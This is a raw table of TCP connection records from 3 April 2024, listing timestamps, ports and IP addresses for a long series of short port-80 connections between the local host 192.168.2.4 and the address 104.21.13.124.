Apr 3, 2024 06:37:43.004503012 CEST	80	49761	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:43.024776936 CEST	49762	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:43.149976969 CEST	80	49762	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:43.150163889 CEST	49762	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:43.152523994 CEST	49762	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:43.277321100 CEST	80	49762	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:43.277462006 CEST	49762	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:43.402322054 CEST	80	49762	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:43.712430954 CEST	80	49762	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:43.712752104 CEST	49762	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:43.712779045 CEST	80	49762	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:43.712843895 CEST	49762	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:43.837704897 CEST	80	49762	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:43.859626055 CEST	49763	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:43.984906912 CEST	80	49763	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:43.985016108 CEST	49763	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:43.987495899 CEST	49763	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:44.113976002 CEST	80	49763	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:44.114038944 CEST	49763	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:44.238790035 CEST	80	49763	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:44.554058075 CEST	80	49763	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:44.554390907 CEST	80	49763	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:44.554490089 CEST	49763	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:44.554491043 CEST	49763	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:44.679366112 CEST	80	49763	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:45.078643084 CEST	49764	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:45.202615023 CEST	80	49764	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:45.202881098 CEST	49764	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:45.205065012 CEST	49764	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:45.328929901 CEST	80	49764	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:45.329044104 CEST	49764	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:45.453088999 CEST	80	49764	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:45.763633013 CEST	80	49764	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:45.765156031 CEST	80	49764	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:45.765356064 CEST	49764	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:46.682194948 CEST	49764	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:46.806365013 CEST	80	49764	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:46.832370043 CEST	49765	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:46.956866980 CEST	80	49765	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:46.956984043 CEST	49765	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:46.959263086 CEST	49765	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:47.083585024 CEST	80	49765	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:47.083638906 CEST	49765	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:47.208086014 CEST	80	49765	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:47.518312931 CEST	80	49765	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:47.518332958 CEST	80	49765	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:47.518404007 CEST	49765	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:47.518574953 CEST	49765	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:47.642983913 CEST	80	49765	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:47.651454926 CEST	49766	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:47.776068926 CEST	80	49766	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:47.776228905 CEST	49766	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:47.778228998 CEST	49766	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:47.902756929 CEST	80	49766	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:47.902832031 CEST	49766	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:48.027184963 CEST	80	49766	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:48.190229893 CEST	80	49766	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:48.190350056 CEST	80	49766	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:48.190416098 CEST	49766	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:48.190874100 CEST	49766	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:48.315188885 CEST	80	49766	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:48.349466085 CEST	49767	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:48.475400925 CEST	80	49767	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:48.475505114 CEST	49767	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:48.477935076 CEST	49767	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:48.603043079 CEST	80	49767	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:48.603128910 CEST	49767	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:48.728399992 CEST	80	49767	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:48.892909050 CEST	80	49767	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:48.893194914 CEST	80	49767	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:48.893407106 CEST	49767	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:48.893496037 CEST	49767	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:49.018604040 CEST	80	49767	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:49.030618906 CEST	49768	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:49.155570030 CEST	80	49768	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:49.155762911 CEST	49768	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:49.163901091 CEST	49768	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:49.288674116 CEST	80	49768	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:49.288872957 CEST	49768	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:49.413748026 CEST	80	49768	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:49.587447882 CEST	80	49768	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:49.587692022 CEST	49768	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:49.587770939 CEST	80	49768	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:49.587816954 CEST	49768	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:49.712645054 CEST	80	49768	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:49.728595018 CEST	49769	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:49.853493929 CEST	80	49769	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:49.853621960 CEST	49769	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:49.855566025 CEST	49769	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:49.980262995 CEST	80	49769	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:49.980385065 CEST	49769	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:50.105382919 CEST	80	49769	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:50.284646034 CEST	80	49769	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:50.285000086 CEST	49769	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:50.285485029 CEST	80	49769	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:50.285542965 CEST	49769	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:50.410108089 CEST	80	49769	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:50.419902086 CEST	49770	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:50.544884920 CEST	80	49770	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:50.545001030 CEST	49770	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:50.546988010 CEST	49770	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:50.672009945 CEST	80	49770	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:50.672096014 CEST	49770	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:50.796952963 CEST	80	49770	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:50.965027094 CEST	80	49770	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:50.965090990 CEST	80	49770	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:50.965167046 CEST	49770	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:50.965337038 CEST	49770	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:51.090013981 CEST	80	49770	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:51.116822958 CEST	49772	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:51.241008043 CEST	80	49772	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:51.241211891 CEST	49772	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:51.243601084 CEST	49772	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:51.367670059 CEST	80	49772	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:51.367784023 CEST	49772	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:51.491777897 CEST	80	49772	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:51.667047977 CEST	80	49772	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:51.667392969 CEST	49772	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:51.667726040 CEST	80	49772	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:51.667795897 CEST	49772	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:51.791382074 CEST	80	49772	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:51.819758892 CEST	49773	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:51.944730043 CEST	80	49773	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:51.944817066 CEST	49773	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:51.947016954 CEST	49773	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:52.071604013 CEST	80	49773	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:52.071666956 CEST	49773	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:52.196434975 CEST	80	49773	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:52.502201080 CEST	80	49773	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:52.502243042 CEST	80	49773	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:52.502301931 CEST	49773	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:52.502484083 CEST	49773	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:52.627346039 CEST	80	49773	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:52.642806053 CEST	49774	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:52.768068075 CEST	80	49774	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:52.769684076 CEST	49774	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:52.772037029 CEST	49774	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:52.897028923 CEST	80	49774	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:52.897661924 CEST	49774	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:53.022516012 CEST	80	49774	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:53.322824955 CEST	80	49774	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:53.323098898 CEST	80	49774	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:53.323123932 CEST	49774	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:53.323160887 CEST	49774	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:53.447895050 CEST	80	49774	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:53.471502066 CEST	49775	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:53.596381903 CEST	80	49775	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:53.596530914 CEST	49775	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:53.598973036 CEST	49775	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:53.723874092 CEST	80	49775	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:53.723952055 CEST	49775	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:53.848834991 CEST	80	49775	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:54.150489092 CEST	80	49775	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:54.150844097 CEST	80	49775	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:54.150950909 CEST	49775	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:54.151000023 CEST	49775	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:54.275767088 CEST	80	49775	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:54.295859098 CEST	49776	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:54.420897007 CEST	80	49776	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:54.421180010 CEST	49776	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:54.423487902 CEST	49776	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:54.548626900 CEST	80	49776	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:54.548974037 CEST	49776	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:54.674163103 CEST	80	49776	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:54.846003056 CEST	80	49776	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:54.846191883 CEST	80	49776	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:54.846254110 CEST	49776	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:54.846254110 CEST	49776	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:54.971266031 CEST	80	49776	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:54.981865883 CEST	49777	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:55.106661081 CEST	80	49777	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:55.106748104 CEST	49777	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:55.108964920 CEST	49777	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:55.234108925 CEST	80	49777	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:55.234338045 CEST	49777	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:55.359088898 CEST	80	49777	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:55.527488947 CEST	80	49777	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:55.527689934 CEST	80	49777	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:55.527837992 CEST	49777	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:55.529896021 CEST	49777	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:55.654479027 CEST	80	49777	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:55.669673920 CEST	49778	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:55.794410944 CEST	80	49778	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:55.794631004 CEST	49778	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:55.796602011 CEST	49778	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:55.921413898 CEST	80	49778	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:55.921500921 CEST	49778	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:56.046474934 CEST	80	49778	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:56.348131895 CEST	80	49778	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:56.348357916 CEST	80	49778	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:56.348445892 CEST	49778	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:56.348505974 CEST	49778	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:56.473372936 CEST	80	49778	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:56.482978106 CEST	49779	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:56.607451916 CEST	80	49779	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:56.607649088 CEST	49779	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:56.609631062 CEST	49779	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:56.733977079 CEST	80	49779	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:56.734040976 CEST	49779	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:56.858380079 CEST	80	49779	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:57.166856050 CEST	80	49779	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:57.167562962 CEST	49779	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:57.167588949 CEST	80	49779	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:57.167644024 CEST	49779	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:57.292037010 CEST	80	49779	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:57.308209896 CEST	49780	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:57.433063984 CEST	80	49780	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:57.433182955 CEST	49780	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:57.435446978 CEST	49780	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:57.562716961 CEST	80	49780	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:57.562799931 CEST	49780	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:57.687421083 CEST	80	49780	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:57.862072945 CEST	80	49780	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:57.862334967 CEST	49780	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:57.862368107 CEST	80	49780	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:57.862423897 CEST	49780	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:57.987112999 CEST	80	49780	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:57.994575977 CEST	49781	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:58.120341063 CEST	80	49781	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:58.120425940 CEST	49781	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:58.122430086 CEST	49781	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:58.247193098 CEST	80	49781	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:58.247253895 CEST	49781	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:58.372067928 CEST	80	49781	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:58.551086903 CEST	80	49781	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:58.551328897 CEST	49781	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:58.551991940 CEST	80	49781	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:58.552046061 CEST	49781	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:58.675852060 CEST	80	49781	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:58.683415890 CEST	49782	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:58.807888031 CEST	80	49782	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:58.807971954 CEST	49782	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:58.810148954 CEST	49782	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:58.934504032 CEST	80	49782	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:58.934648037 CEST	49782	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:59.059081078 CEST	80	49782	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:59.368338108 CEST	80	49782	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:59.368614912 CEST	49782	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:59.369045019 CEST	80	49782	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:59.369098902 CEST	49782	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:59.493033886 CEST	80	49782	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:59.512943029 CEST	49783	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:59.637716055 CEST	80	49783	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:59.637969971 CEST	49783	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:59.640455008 CEST	49783	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:59.765137911 CEST	80	49783	104.21.13.124	192.168.2.4
Apr 3, 2024 06:37:59.765212059 CEST	49783	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:37:59.889923096 CEST	80	49783	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:00.062184095 CEST	80	49783	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:00.062426090 CEST	80	49783	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:00.062472105 CEST	49783	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:00.062509060 CEST	49783	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:00.187778950 CEST	80	49783	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:00.204180956 CEST	49784	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:00.328953981 CEST	80	49784	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:00.329054117 CEST	49784	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:00.331065893 CEST	49784	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:00.455873966 CEST	80	49784	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:00.456084967 CEST	49784	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:00.580812931 CEST	80	49784	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:00.744595051 CEST	80	49784	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:00.744616985 CEST	80	49784	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:00.744724035 CEST	49784	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:00.744951010 CEST	49784	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:00.887756109 CEST	49785	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:01.012801886 CEST	80	49785	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:01.012892008 CEST	49785	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:01.015338898 CEST	49785	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:01.060189009 CEST	49784	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:01.139978886 CEST	80	49785	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:01.140033960 CEST	49785	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:01.185215950 CEST	80	49784	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:01.264936924 CEST	80	49785	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:01.575891972 CEST	80	49785	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:01.575977087 CEST	80	49785	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:01.576164007 CEST	49785	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:01.576189041 CEST	49785	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:01.701508999 CEST	80	49785	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:01.716912985 CEST	49786	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:01.842092991 CEST	80	49786	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:01.842171907 CEST	49786	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:01.844435930 CEST	49786	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:01.969512939 CEST	80	49786	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:01.969675064 CEST	49786	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:02.094578028 CEST	80	49786	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:02.272619963 CEST	80	49786	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:02.272871971 CEST	49786	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:02.273231030 CEST	80	49786	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:02.273282051 CEST	49786	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:02.397948980 CEST	80	49786	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:02.419236898 CEST	49787	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:02.544114113 CEST	80	49787	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:02.544361115 CEST	49787	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:02.546391010 CEST	49787	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:02.671124935 CEST	80	49787	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:02.671345949 CEST	49787	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:02.796159983 CEST	80	49787	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:02.965898991 CEST	80	49787	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:02.966480970 CEST	80	49787	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:02.966550112 CEST	49787	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:02.978775978 CEST	49787	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:03.103550911 CEST	80	49787	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:03.126468897 CEST	49788	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:03.252609968 CEST	80	49788	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:03.252717972 CEST	49788	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:03.254673004 CEST	49788	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:03.382848978 CEST	80	49788	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:03.382950068 CEST	49788	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:03.507481098 CEST	80	49788	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:03.684485912 CEST	80	49788	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:03.684839964 CEST	49788	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:03.685261965 CEST	80	49788	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:03.685326099 CEST	49788	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:03.812505007 CEST	80	49788	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:03.848063946 CEST	49789	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:03.973054886 CEST	80	49789	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:03.973202944 CEST	49789	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:05.256072998 CEST	49789	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:05.380599976 CEST	80	49789	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:05.380669117 CEST	49789	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:05.505032063 CEST	80	49789	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:05.674985886 CEST	80	49789	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:05.675131083 CEST	80	49789	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:05.675184965 CEST	49789	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:05.675249100 CEST	49789	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:05.799856901 CEST	80	49789	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:05.807652950 CEST	49790	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:05.936413050 CEST	80	49790	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:05.936491013 CEST	49790	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:05.938499928 CEST	49790	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:06.063760042 CEST	80	49790	104.21.13.124	192.168.2.4
Apr 3, 2024 06:38:06.063873053 CEST	49790	80	192.168.2.4	104.21.13.124
Apr 3, 2024 06:38:06.189111948 CEST	80	49790	104.21.13.124	192.168.2.4
